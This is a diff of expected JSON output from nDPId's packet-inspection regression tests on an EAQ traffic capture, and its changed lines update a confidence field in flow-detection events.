00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"} -00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious 
User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}} +00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820949586,"flow_last_seen":1432820949586,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820949586,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820949586,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949586,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNX0AAAAAAAADdoAAUsHAACQAA=="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820949685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820949685,"pkt":"ABoRAAACABoRAAABCABFAAAsAAxAABARDWHIuYqSCggAARdwzCEAGAX1AAAAAAAADdoAAUsHAABgAA=="} 
@@ -77,15 +77,15 @@ 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820970111,"flow_last_seen":1432820970111,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820970111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1432820970111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820970111,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4bIKCAAByMKGQ5x6F3AAGJpnAAAAAAAADdoADrp0AACQAA=="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432820971111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971111,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNRlAAAAAQAADdsAAUyUAACQAA=="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949586,"flow_last_seen":1432820971175,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971175,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949586,"flow_last_seen":1432820971175,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971175,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432820971175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971175,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR6hwKCAAByLl94r76F3AAGJ\/qAAAAAQAADdsAAZrmAACQAA=="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949685,"flow_last_seen":1432820971265,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971265,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949685,"flow_last_seen":1432820971265,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971265,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432820971265,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971265,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07IKCAAByMKUQ8lxF3AAGL1RAAAAAQAADdsAAlydAACQAA=="} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949735,"flow_last_seen":1432820971335,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971335,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949735,"flow_last_seen":1432820971335,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971335,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432820971335,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971335,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07MKCAAByMKUQqZ8F3AAGKzSAAAAAQAADdsABZAPAACQAA=="} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950801,"flow_last_seen":1432820971405,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950801,"flow_last_seen":1432820971405,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1432820971406,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971406,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07EKCAAByMKURKp5F3AAGJfzAAAAAQAADdsABqDuAACQAA=="} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950865,"flow_last_seen":1432820971475,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971475,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950865,"flow_last_seen":1432820971475,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820971475,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432820971475,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820971475,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rMKCAAByMKNQqHeF3AAGIJFAAAAAQAADdwAAsY8AACQAA=="} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432820972471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820972471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rEKCAAByMKNRId\/F3AAGLwmAAAAAQAADdwABaa1AACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820973471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820973471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3rIKCAAByMKJQ5k1F3AAGK1eAAAAAQAADdwABafIAACQAA=="} 
@@ -95,12 +95,12 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432820977471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820977471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR5rMKCAAByMKBQr4aF3AAGPN5AAAAAQAADdwABkTIAACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432820978471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820978471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR5rEKCAAByMKBRLpiF3AAGNEoAAAAAQAADdwABmrPAACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432820979471,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820979471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47MKCAAByMKEQqvLF3AAGLWJAAAAAQAADdwABpIHAACQAA=="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957932,"flow_last_seen":1432820979565,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820979565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957932,"flow_last_seen":1432820979565,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820979565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432820979565,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820979565,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rIKCAAByMKNQ72zF3AAGJmsAAAAAQAADdwABpL7AACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1432820980561,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820980561,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47IKCAAByMKEQ5kRF3AAGFMTAAAAAQAADdwABwc2AACQAA=="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820958981,"flow_last_seen":1432820980615,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820980615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820958981,"flow_last_seen":1432820980615,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820980615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1432820980615,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820980615,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47EKCAAByMKERM32F3AAGHylAAAAAQAADdwAB6i9AACQAA=="} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959035,"flow_last_seen":1432820980685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820980685,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959035,"flow_last_seen":1432820980685,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432820980685,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1432820980685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820980685,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rMKCAAByMKFQttAF3AAGE3SAAAAAQAADdwAB8lIAACQAA=="} 
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1432820981681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820981681,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rIKCAAByMKFQ96sF3AAGCMsAAAAAQAADdwAB\/CBAACQAA=="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1432820982681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432820982681,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rEKCAAByMKFRM9DF3AAGCE7AAAAAQAADdwACQHZAACQAA=="} 
@@ -134,58 +134,58 @@ 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1432821011311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432821011311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR37IKCAAByMKIQ+ptF3AAGKMiAAAAAgAADd4ADGHCAACQAA=="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1432821012311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432821012311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR0rMKCAAByMKVQoJMF3AAGLfNAAAAAgAADd4ADqg3AACQAA=="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1432821013311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1432821013311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4bIKCAAByMKGQ5x6F3AAGKtOAAAAAgAADd4ADqmHAACQAA=="} 